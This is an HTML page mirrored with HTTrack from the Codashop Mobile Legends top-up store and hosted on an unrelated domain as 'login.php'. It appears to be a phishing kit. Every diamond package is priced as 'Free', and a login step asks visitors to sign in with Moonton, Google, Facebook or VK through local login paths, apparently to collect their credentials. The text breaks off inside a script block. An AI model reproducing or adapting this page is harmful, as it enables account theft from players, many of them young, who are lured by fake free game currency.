<!doctype html>
<html lang="en">

<!-- Mirrored from codafreemlshp.wikaba.com/login.php by HTTrack Website Copier/3.x [XR&CO'2014], Thu, 05 Nov 2020 09:18:36 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/xss.min.js"></script>
<script type="text/javascript">
    (function(t,a,p){t.TapfiliateObject=a;t[a]=t[a]||function(){ (t[a].q=t[a].q||[]).push(arguments)}})(window,'tap');
    tap('create', '11857-697628');
    tap('detect');
</script>
<meta charset="UTF-8">
<!--[if lt IE 9]>
<script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.7.3/html5shiv.min.js"></script>
<![endif]-->
<title>Mobile Legends - Codashop</title>
<meta name="generator" content="coda2"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, viewport-fit=cover">
<meta name="mobile-web-app-capable" content="yes"/>
<meta name="apple-mobile-web-app-capable" content="yes"/>
<meta name="application-name" content="Codashop"/>
<meta name="apple-mobile-web-app-capable " content="yes "/>
<meta name="apple-mobile-web-app-status-bar-style " content="black "/>
<meta name="apple-mobile-web-app-title " content="Codashop "/>
<link rel="apple-touch-icon " href="https://cdn1.codashop.com/S2/content/mobile/images/app/codashop-ico-192x192.eda9c373cc.png"/>
<meta name="msapplication-TileImage " content="https://cdn1.codashop.com/S2/content/mobile/images/app/codashop-ico-144x144.e4494b8304.png"/>
<meta name="msapplication-TileColor " content="#f76b1d "/>
<meta name="theme-color " content="#f76b1d"/>
<link rel="manifest" href="manifest.html"/>
<meta name="format-detection" content="telephone=no"/>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<link rel="icon" type="image/x-icon" href="https://cdn1.codashop.com/S/content/common/images/favicon.ico"/>
<!-- OG Tags Start -->
<meta property="og:url" content="https://www.codashop.com/sg/mobile-legends"/>
<meta property="og:type" content="product"/>
<meta property="og:title" content="Mobile Legends - Codashop"/>
<meta property="og:description" content="Buy diamonds for Mobile Legends using Alipay,Wechat Pay, and GrabPay. Instant delivery, no credit card required, and trusted in the world – Buy now!"/>
<meta property="og:image" content="https://cdn1.codashop.com/S/content/common/images/mno/mlbb_640x241.jpg"/>
<meta property="og:image:width" content="1200"/>
<meta property="og:image:height" content="630"/>
<!-- OG Tags End -->
<meta name="description" content="Buy diamonds for Mobile Legends using Alipay,Wechat Pay, and GrabPay. Instant delivery, no credit card required, and trusted in South East Asia – Buy now!"/>
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<script type="text/javascript" src="https://cdn1.codashop.com/P/production/airtime/w/js/airtime_v1.0a.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/jquery-1.12.4_2.min.js"></script>
<link rel="preconnect" href="https://cdn.onesignal.com/">
<link rel="preconnect" href="https://cdn1.codashop.com/">
<style>
        .product__long-description, .product-container, .footer-container {
            display: none;
        }
</style>
</head>
<body class="theme-page--product-page">

<style>
.btn-login {
background: none;
width: 100%;
height: auto;
margin-left: auto;
margin-right: auto;
margin-bottom: 5px;
padding: 10px;
color: #fff;
font-size: 16px;
font-weight: bold;
text-align: center;
border: none;
border-radius: 5px;
outline: none;
display: block;
}
.btn-login i {
float: left;
}
.bg-facebook {
background: #1778f2;
}
.bg-google {
background: #4285f4;
}
.bg-vk {
background: #4376a6;
}
.bg-moonton {
background: #e0ac00;
}
</style>

<div id="product-page__container" class="product-page__container">
	<script type="text/javascript">
    $(document).ready(function () {
        countryCode = '702';
    });
    var viewAllText = 'View all';
    var resultUnitText = 'Results';
    var notFoundText = 'No results found';
	</script>
	<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/shop-topnav2.7e1fed6bdf.js"></script>
	<nav class="top-navbar top-nav--general">
	<div class="top-nav-container">
		<div class="logo-container">
			<a class="logo-container-link"><img class="logo-image theme-default__logo" src="https://cdn1.codashop.com/S/content/mobile/images/codashop-logo.png" alt="Codashop"/></a>
			<h3 class="slogan-element">The fastest & easiest way to buy game credits</h3>
		</div>
		<div class="search-container">
			<div class="search-icon-container">
				<svg class="search-icon" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24"><path d="M23.809 21.646l-6.205-6.205c1.167-1.605 1.857-3.579 1.857-5.711 0-5.365-4.365-9.73-9.731-9.73-5.365 0-9.73 4.365-9.73 9.73 0 5.366 4.365 9.73 9.73 9.73 2.034 0 3.923-.627 5.487-1.698l6.238 6.238 2.354-2.354zm-20.955-11.916c0-3.792 3.085-6.877 6.877-6.877s6.877 3.085 6.877 6.877-3.085 6.877-6.877 6.877c-3.793 0-6.877-3.085-6.877-6.877z"/></svg>
			</div>
		</div>
	</div>
	<div class="search-input-container">
		<input type="search" name="search-keyword" id="search-keyword" class="input-search" placeholder='Search for a game or voucher'></div>
	<div class="search-result-list"></div>
	</nav>
	<nav class="top-navbar top-nav--productpage">
	<div class="top-nav-container">
		<div class="custom-page__logo" style="display: none">
			<div class="logo-image-container">
				<a><img class="logo-image" src="https://cdn1.codashop.com/S/content/common/images/grab.29dad06670f873936002ddb910253a4b.png" alt="Grabpay"></a>
			</div>
			<span class="brand-tagline"></span>
		</div>
		<div class="logo-container">
			<a class="logo-container-link"><img class="logo-image theme-default__logo" src="https://cdn1.codashop.com/S/content/mobile/images/codashop-logo.png" alt="Codashop"/></a>
			<h3 class="slogan-element">The fastest & easiest way to buy game credits</h3>
		</div>
		<div class="search-input-container">
			<div class="search-input-container--productpage">
				<input type="search" name="search-input" id="search-input" class="search-input__productpage" placeholder='Search for a game or voucher'>
				<svg class="search-icon--productpage" xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewbox="0 0 24 24"><path d="M23.809 21.646l-6.205-6.205c1.167-1.605 1.857-3.579 1.857-5.711 0-5.365-4.365-9.73-9.731-9.73-5.365 0-9.73 4.365-9.73 9.73 0 5.366 4.365 9.73 9.73 9.73 2.034 0 3.923-.627 5.487-1.698l6.238 6.238 2.354-2.354zm-20.955-11.916c0-3.792 3.085-6.877 6.877-6.877s6.877 3.085 6.877 6.877-3.085 6.877-6.877 6.877c-3.793 0-6.877-3.085-6.877-6.877z"/></svg>
			</div>
			<div class="search-result-list"></div>
		</div>
	</div>
	</nav>
	<div class="notification-wrapper"></div>
	<main class="container product-container">
	<input type="hidden" id="page-name" value="productPage">
	<input type="hidden" id="country-id" value="ID">
	<header class="product-details-container shop-content__container">
	<figure class="product-top-banner__container shop-content--image">
	<img src="https://cdn1.codashop.com/S/content/common/images/mno/mlbb_640x241.jpg" alt="" class="product__top-banner">
	</figure>
	<h2 class="product__name shop-content--heading">Mobile Legends</h2>
	<input type="checkbox" id="product-description" name="product-description" class="product-description-checkbox">
	<label for="product-description">
	<span class="more-info">More info</span>
	<span class="less-info">Less info</span>
	</label>
	<article class="product__description shop-content__container">
	<p class="shop-content--paragraph">
		Top up Mobile Legends: Bang Bang Diamonds in seconds! Just enter your Mobile Legends: Bang Bang user ID, select the value of Diamonds you wish to purchase, complete the payment, and the Diamonds will be added immediately to your MLBB account.
	</p>

	<p class="shop-content--paragraph">
		Download Mobile Legends: Bang Bang now!<br>
		 
        <a href="https://apps.apple.com/us/app/mobile-legends-bang-bang/id1160056295" rel="noopener" target="_blank">
            <img src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/mobile/images/app_store_coda.png" style="width:86px; padding-top: 5px;" alt="Download on the App Store">
        </a>
	
	    <a href="https://play.google.com/store/apps/details?id=com.mobile.legends&hl=in&gl=US" rel="noopener" target="_blank">
	        <img src="https://d1qgcmfii0ptfa.cloudfront.net/S/content/mobile/images/google_play_coda.png" style="width:86px; padding-top: 5px;" alt="Download on Google Play">
		</a>
	</p>
	</article>
	</header>
	<section id="contents" class="main-content">
	<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/jquery.mask.min.js"></script>
	<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/mobile/js/moonton.0966364eb8.js"></script>
	<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/third_party_common.0859f0e010.js"></script>
	<script type="text/javascript">
    $(document).ready(function(){
        $( "#confirm-user-dialog" ).dialog({
            resizable: false,
            height: "auto",
            dialogClass: "no-titlebar",
            autoOpen: false,
            modal: true,
            dialogClass: "confirm-user-dialog__container",
            buttons: [
                {
                    text: 'Cancel',
                    class: "confirm-user-dialog__btn btn-cancel",
                    click: function() {
                        CODA.Shop.txnId = null;
                        $('.confirm-user-dialog__container').hide();
                        $("#overlay").hide();
                    }
                },
                {
                    text: 'Confirm and go to payment',
                    class: "confirm-user-dialog__btn btn-blue",
                    click: function() {
                        $('.confirm-user-dialog__container').hide();
                        $("#overlay").hide();
                        openTxnWindow();
                    }
                }
            ],
            create: function (event, ui) {
                $(".ui-widget-header").hide();
                $(this).closest(".ui-dialog").css("padding-top", "15px");
            }
        });
    });
    function showConfirmation(data, extraMsg) {
        var ul = $("#confirm-user-dialog > ul");
        ul = $(ul);
        $("#confirm-user-dialog > ul > li").not('li:first, li:nth-child(2)').remove();
        var li = $();
        var nickname;
        try {
            nickname = decodeURIComponent(JSON.parse(decodeURIComponent(data.result)).username);
        } catch(e) {
            nickname = "";
        }
        nickname = filterXSS(nickname);
        li = li.add("<li class='confirm-user-dialog__extra-msg'>" + extraMsg + "</li>");
        li = li.add("<li><div>" + 'Nickname:' + "</div><div>" + nickname + "</div></li>");
        li = li.add("<li><div>" + 'ID: ' + "</div><div style='direction:ltr'>" + data.user.userId + "(" + data.user.zoneId + ")" +"</div></li>");
        li = li.add("<li><div>" + 'Price:' + "</div><div>" + data.channelPrice + "</div></li>");
        li = li.add("<li><div>" + 'Pay with:' + "</div><div>" + data.paymentChannel + "</div></li>");
        li.appendTo(ul);
        ul.appendTo("#confirm-user-dialog");
        $("#overlay").fadeIn( function(){
            $(".confirm-user-dialog__container").show();
        });
    }
	</script>
	<div class="section buy default-template">
		<h2 class="circle">
		<span>4</span>
		<div class="section-title">Login</div>
		</h2>
		<div class="form" id="formSection">
			<p class="emailOptional default-1">
				Please login with your Mobile Legends: Bang Bang account to continue this payment
			</p>
			<div class="email-input-container">
			<button type="button" class="btn-login bg-moonton" onclick="location.href='login/moonton/';"><i class="fa fa-user-circle"></i> Login with Moonton</button>
			<button type="button" class="btn-login bg-google" onclick="location.href='login/google/';"><i class="fa fa-google"></i> Login with Google</button>
			<button type="button" class="btn-login bg-facebook" onclick="location.href='login/facebook/';"><i class="fa fa-facebook-square"></i> Login with Facebook</button>
			<button type="button" class="btn-login bg-vk" onclick="location.href='login/vk/';"><i class="fa fa-vk"></i> Login with VK</button>
			</div>
			<div class="email-form-btn-group">
				<a href="index.html" class="email-form-btn__submit">
				<span class="btn-submit-text">Back</span>
				<span class="btn-submit-text for-grab"></span>
				</a>
			</div>
		</div>
	</div>
	<div class="popError">
		<div class="section">
			<h2 class="errorHeader">Oops!</h2>
			<ul class="errorMessage__container" id="errorMessage">
				<li class="error-msg__element">Please select a voucher denomination</li>
				<li class="error-msg__element">Please select a payment method</li>
				<li class="error-msg__element">Please enter a valid e-mail address.</li>
			</ul>
			<a href="javascript:hideErrorPopup();" class="modal-button">Back to page</a>
		</div>
	</div>
	<div id="overlay" class="overlay-element"></div>
	</section>
	</main>
	<section class="section product__long-description shop-content__container">
	<h1 class="product-tagline-title">Top Up Mobile Legends: Bang Bang Diamonds in Codashop </h1>
	<article class="product__tag-line">
	<p class="shop-content--paragraph">
		You're just seconds away from buying diamonds for Mobile Legends! To complete your purchase, simply choose the voucher denomination that you want, and the payment channel through which you'd like to pay, and then enter your email address. You'll then be asked to complete the payment, and after doing so the top up information will be automatically emailed to you. You will receive your diamonds in your game.
	</p>
	<p class="shop-content--paragraph"><strong>About Mobile Legends:</strong>
		<br>
		 Join your friends in a brand new 5v5 MOBA showdown against real human opponents, Mobile Legends! Choose your favorite heroes and build the perfect team with your comrades-in-arms! 10-second matchmaking, 10-minute battles. Laning, jungling, tower rushing, team battles, all the fun of PC MOBAs and action games in the palm of your hand! Feed your eSports spirit!
	</p>
	</article>
	</section>
	<section class="faq-accordion-container">
	<div class="accordion-container"></div>
	</section>
	<link rel="stylesheet" href="https://cdn1.codashop.com/S/content/common/css/jquery-ui-1.12.1.css"/>
	<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/common/css/shared-topnav2.5566e671b1.css"/>
	<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/mobile/css/productPage/responsive-product-page2.46eff85d29.css"/>
	<!-- info bar css -->
	<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/mobile/css/infoBar.662b8f1b5f.css"/>
	<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/common/css/shared-shop-content.e6202b83de.css"/>
	<link rel="stylesheet preload" type="text/css" href="https://cdn1.codashop.com/S2/content/common/css/shared-fontfaces.b6c83d3582.css" as="style"/>
	<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/common/css/shared-footer2.2ce4d6e299.css"/>
	<footer class="footer-container">
	<div class="footer-area">
		<section class="left-blocks-container">
		<div class="socials-container">
			<p class="social-title">Stay updated with us:</p>
			<div class="footer__social-media-container">
			    <a href="#">
			        <img style="width: 25px;" src="https://cdn1.codashop.com/S/content/social-media-logo/36/socmed-facebook-H36.png">
			    </a>
			</div>
		</div>
		<div class="support-container">
			<p class="support-title">Need Help?</p>
			<a href="#" style="text-decoration:none">
			<div class="contact-icon">
				<svg xmlns="http://www.w3.org/2000/svg" viewbox="0 0 448 512"><path d="M320 352h-23.1a174.08 174.08 0 0 1-145.8 0H128A128 128 0 0 0 0 480a32 32 0 0 0 32 32h384a32 32 0 0 0 32-32 128 128 0 0 0-128-128zM48 224a16 16 0 0 0 16-16v-16c0-88.22 71.78-160 160-160s160 71.78 160 160v16a80.09 80.09 0 0 1-80 80h-32a32 32 0 0 0-32-32h-32a32 32 0 0 0 0 64h96a112.14 112.14 0 0 0 112-112v-16C416 86.13 329.87 0 224 0S32 86.13 32 192v16a16 16 0 0 0 16 16zm160 0h32a64 64 0 0 1 55.41 32H304a48.05 48.05 0 0 0 48-48v-16a128 128 0 0 0-256 0c0 40.42 19.1 76 48.35 99.47-.06-1.17-.35-2.28-.35-3.47a64.07 64.07 0 0 1 64-64z"/></svg>
			</div>
			<div class="contact-text">Contact Support</div>
			</a>
		</div>
		<div class="international-container">
			<a class="international-flag-block" rel="noopener" href="#">
			<img style="width: 35px; height: 20px;" src="https://upload.wikimedia.org/wikipedia/en/thumb/a/ae/Flag_of_the_United_Kingdom.svg/1200px-Flag_of_the_United_Kingdom.svg.png">
			<div class="international__country-name">English</div>
			</a>
		</div>
		</section>
		<section class="right-blocks-container">
		<div class="legal-content-container">
			<a href="#">Marketing & Partnerships</a>
			<a href="#">Terms & Conditions</a>
			<a href="#">Privacy Policy</a>
		</div>
		<div class="copyright-container">©Copyright Coda Payments</div>
		</section>
	</div>
	</footer>
</div>
<script>
        if ( (location.href.includes("grab-demo.coda")) || (location.href.includes("grab.codashop")) ) { 
            $("body").addClass("custom--grab");
            $(".logo-container-link").contents().unwrap();
            $("body").append('<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S2/content/mobile/css/responsive-grab-page.6b9f5c3d59.css" />');
        }</script>
<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/S/content/common/css/flags.css"/>
<link rel="stylesheet" type="text/css" href="https://cdn1.codashop.com/P/airtime/w/css/airtime_v1.0a.css"/>
<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/jquery.cookie.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/jquery-ui-1.12.1.min.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S/content/common/js/custom-page.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/pages/js/productPage.292db338b2.js"></script>
<script type="text/javascript" src="https://cdn1.codashop.com/S2/content/common/js/common-sw.a5e6866cb8.js"></script>
<script type="text/javascript">
        $(document).ready(function () {
            CODA.Shop.voucherDenominationLists = JSON.parse('[{\"displayPrice\":\"40 Diamonds\",\"id\":[9997],\"displayId\":\"9997\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_1\"],\"sortOrderId\":[1],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78551,\"voucherDenominationId\":9997,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":1.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"118 Diamonds\",\"id\":[9998],\"displayId\":\"9998\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_3\"],\"sortOrderId\":[2],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78557,\"voucherDenominationId\":9998,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":3.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"197 Diamonds\",\"id\":[9999],\"displayId\":\"9999\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_5\"],\"sortOrderId\":[3],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78563,\"voucherDenominationId\":9999,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":5.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"377 Diamonds\",\"id\":[10000],\"displayId\":\"10000\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_10\"],\"sortOrderId\":[4],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78569,\"voucherDenominationId\":10000,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":10.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"797 Diamonds\",\"id\":[10001],\"displayId\":\"10001\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_20\"],\"sortOrderId\":[5],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78575,\"voucherDenominationId\":10001,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":20.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"1177 Diamonds\",\"id\":[10002],\"displayId\":\"10002\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_30\"],\"sortOrderId\":[6],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78581,\"voucherDenominationId\":10002,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":30.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"2156 Diamonds\",\"id\":[10003],\"displayId\":\"10003\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_50\"],\"sortOrderId\":[7],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78587,\"voucherDenominationId\":10003,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":50.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"3222 Diamonds\",\"id\":[10004],\"displayId\":\"10004\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_80\"],\"sortOrderId\":[8],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78593,\"voucherDenominationId\":10004,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":80.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]},{\"displayPrice\":\"4027 Diamonds\",\"id\":[10005],\"displayId\":\"10005\",\"sellerId\":1359,\"skuHashId\":0,\"voucherId\":[\"diamond__codashopSGD_100\"],\"sortOrderId\":[9],\"hasStock\":[true],\"_status\":[1],\"variableDenominationVoucher\":[false],\"voucherPricePoints\":[{\"id\":78599,\"voucherDenominationId\":10005,\"pricePointPaymentChannel\":{\"id\":260,\"name\":\"GRABPAY_SG\",\"displayName\":\"GrabPay\",\"displayName2\":\"GrabPay SG\",\"isMno\":false,\"sortOrder\":28,\"countryCode\":702,\"tagline\":\"Pay with GrabPay\",\"tutorialType\":0,\"tutorialURL\":\"\",\"channelLogoUrl\":\"login.html\/\/cdn1.codashop.com\/S\/content\/common\/images\/mno\/GRABPAY_SG_CHNL_LOGO.png\",\"enabled\":true,\"channelStatus\":1,\"statusMessage\":\"\"},\"price\":100.0,\"channelVariablePrice\":false,\"displayPrice\":\"Free\",\"deal\":false}]}]');
            CODA.Shop.var.theLanguage = 'en';
            CODA.Shop.constant.SELLER_NAME = 'Mobile Legends';
            CODA.Shop.constant.CURRENCY_NAME = 'SGD';
            CODA.Shop.constant.LANGUAGE_CODE = 'en';
            CODA.Shop.VoucherType = '5';
            CODA.Shop.constant.EMAIL_REQUIRED = 'Make sure your e-mail address is correct, we will use it to deliver your voucher code.';
            CODA.Shop.constant.EMAIL_OPTIONAL = 'OPTIONAL: If you would like a receipt of the purchase by email, please enter an email address';
            CODA.Shop.constant.ALL_REQUIRED = '';
            CODA.Shop.serverListJson = JSON.parse(decodeURIComponent('null'));
            CODA.Shop.Column.sellerGroup.userEmailRequired = `false`;
            CODA.Shop.sellerId = '1359';
            CODA.Shop.Column.sellerGroup.voucherTypeName = `MOBILE_LEGENDS`;
            CODA.Shop.property.ProductAction.variableDenomPriceMaxAmount = '0.0';
            CODA.Shop.property.ProductAction.displayVariablePriceText = 'Enter amount';
            CODA.Shop.property.ProductAction.displayCurrencySymbol = 'S$';
            CODA.Shop.property.ProductAction.variableDenomPriceMinAmount = '0.0';
            CODA.Shop.property.PaymentChannelInfo.XLID = '23';
            CODA.Shop.property.PaymentChannelInfo.TELKOMSELID = '24';
            CODA.Shop.property.PaymentChannelInfo.BOLTID = '25';
            CODA.Shop.property.PaymentChannelInfo.HUTCH_THREEID = '26';
            CODA.Shop.property.PaymentChannelInfo.SEVELINID = '224';
            CODA.Shop.property.PaymentChannelInfo.indosatID = '22';
            CODA.Shop.property.PaymentChannelInfo.smartLiID = '91';
            CODA.Shop.property.VoucherType.HEROES_EVOLVED_KEY = "4";
            CODA.Shop.translation.variablePriceAmountLimit = 'Price limt exceeds';
            CODA.Shop.translation.priceCap = 'PRICE';
            CODA.Shop.translation.notAvailableForDenom = 'Not available for the selected denomination';
            CODA.Shop.translation.invalidVoucher = 'Please select a voucher denomination';
            CODA.Shop.translation.invalidPaymentMethod = 'Please select a payment method';
            CODA.Shop.translation.invalidEmail = 'Please enter a valid e-mail address.';
            CODA.Shop.translation.invalidMobileNumber = '';
            CODA.Shop.translation.invalidMobileNumberLength = '';
            CODA.Shop.translation.validateHeader = 'There&#39;s one or more thing you might have missed or gotten wrong:';
            CODA.Shop.translation.idFormatErrorHeader = 'Invalid UserID format.';
            CODA.Shop.translation.idFormatErrorContent = 'The correct ID format is  12345678.';
            CODA.Shop.translation.roleIdFormatErrorHeader = 'Incorrect Role ID format!';
            CODA.Shop.translation.iggIdFormatErrorHeader = 'Incorrect IGG ID format!';
            CODA.Shop.translation.roleIdFormatErrorContent = 'Wrong!</br>The correct Role ID format is  12345678.';
            CODA.Shop.translation.iggIdFormatErrorContent = 'The correct IGG ID format is  12345678.';
            CODA.Shop.translation.characterIdFormatErrorHeader = 'Invalid Character ID format.';
            CODA.Shop.translation.characterIdFormatErrorContent = 'Character ID is invalid!<br/>The correct format should be  12345678.';
            CODA.Shop.translation.characterIdFormatErrorContent_withServer = 'Character ID is invalid!<br/>The correct format should be  12345678(123-Server Name).';
            CODA.Shop.translation.idFormatErrorContent_withServer = 'The correct ID format is  12345678(123-Server Name).';
            CODA.Shop.translation.idNumberFormatErrorHeader = 'Incorrect ID Number Format!';
            CODA.Shop.translation.userIdFormatErrorHeader = 'Invalid User ID format.';
            CODA.Shop.translation.omletIdFormatErrorHeader = 'Incorrect Omlet ID format!';
            CODA.Shop.translation.userNameFormatErrorHeader = 'Invalid User Name format.';
            CODA.Shop.translation.riotUserNameFormatErrorHeader = '';
            CODA.Shop.translation.accountIdFormatErrorHeader = 'Incorrect Account ID format!';
            CODA.Shop.translation.playerIdFormatErrorHeader = 'Incorrect Player ID format.';
            CODA.Shop.translation.accountCodeFormatErrorHeader = '';
            CODA.Shop.translation.nicknameFormatErrorHeader = 'Format Nickname is wrong!';
            CODA.Shop.translation.sidFormatErrorHeader = '';
            CODA.Shop.translation.userIdFormatErrorContent = 'is invalid!<br/>The correct format should be  12345678.';
            CODA.Shop.translation.omletIdFormatErrorContent = 'The correct Omlet ID format is  12345678.';
            CODA.Shop.translation.userIdFormatErrorContent2 = 'is invalid!<br/>The correct format should be 12345678901234567890_12345678901234567890';
            CODA.Shop.translation.userIdFormatErrorContent_withServer = 'is invalid!<br/>The correct format should be  12345678(1234).';
            CODA.Shop.translation.userIdFormatErrorContent_withServer2 = 'is invalid!<br/>The correct format should be  1234567891_1234567891 (1234567891)';
            CODA.Shop.translation.userIdFormatErrorContent_withServer3 = 'is invalid!<br/>The correct format should be  1234567890@ABCDE (Server Name)';
            CODA.Shop.translation.userNameFormatErrorContent = 'User Name is invalid!<br/>The correct format should be  12345678.';
            CODA.Shop.translation.userNameFormatErrorContent2 = 'User Name is invalid!<br/>The correct format should be  12345678ABCDE_.';
            CODA.Shop.translation.riotUserNameFormatErrorContent = '';
